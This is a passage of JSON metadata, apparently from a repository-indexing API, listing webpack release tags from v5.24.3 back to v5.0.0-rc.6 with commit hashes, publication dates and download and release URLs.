bpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef